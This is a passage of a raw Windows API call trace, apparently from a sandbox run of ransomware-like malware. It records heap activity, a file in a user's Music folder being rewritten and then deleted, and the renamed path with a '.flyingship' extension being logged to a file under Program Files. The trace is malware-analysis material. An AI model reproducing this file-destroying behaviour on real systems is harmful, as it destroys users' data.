Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0186.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0186.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.171] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0186.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba0c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.172] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0186.172] WriteFile (in: hFile=0x120, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0xb998, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0xb998, lpOverlapped=0x0) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0186.174] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.174] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.174] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.174] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.175] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.175] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0186.175] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.175] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.176] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.176] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.176] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.176] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.176] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", lpFilePart=0x0) returned 0x5c [0186.178] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d2450, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0xc396bae0, ftLastAccessTime.dwHighDateTime=0x1d5d8a0, ftLastWriteTime.dwLowDateTime=0x1435f000, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb998, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="pKoP0.mp3", cAlternateFileName="")) returned 0x90af58 [0186.181] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\pkop0.mp3")) returned 1 [0186.188] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d2450, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0xc396bae0, ftLastAccessTime.dwHighDateTime=0x1d5d8a0, ftLastWriteTime.dwLowDateTime=0x1435f000, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb998, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="pKoP0.mp3", cAlternateFileName="")) returned 0 [0186.188] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0186.188] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.189] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.189] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.189] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.189] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0186.190] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.190] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.190] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0186.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0186.190] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.199] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.199] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0186.199] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.199] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0186.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.200] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0186.200] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2488, lpOverlapped=0x0) returned 1 [0186.201] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0186.201] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x2488, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.201] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0186.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0186.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.flyingship.mp3\r\n", cchWideChar=106, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 106 [0186.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a) returned 0x906f38 [0186.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.flyingship.mp3\r\n", cchWideChar=106, lpMultiByteStr=0x906f38, cbMultiByte=106, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 106 [0186.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0186.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0186.201] WriteFile (in: hFile=0x120, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x69, lpOverlapped=0x0) returned 1 [0186.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0186.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.202] CloseHandle (hObject=0x120) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0186.218] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0186.218] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0186.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0186.219] 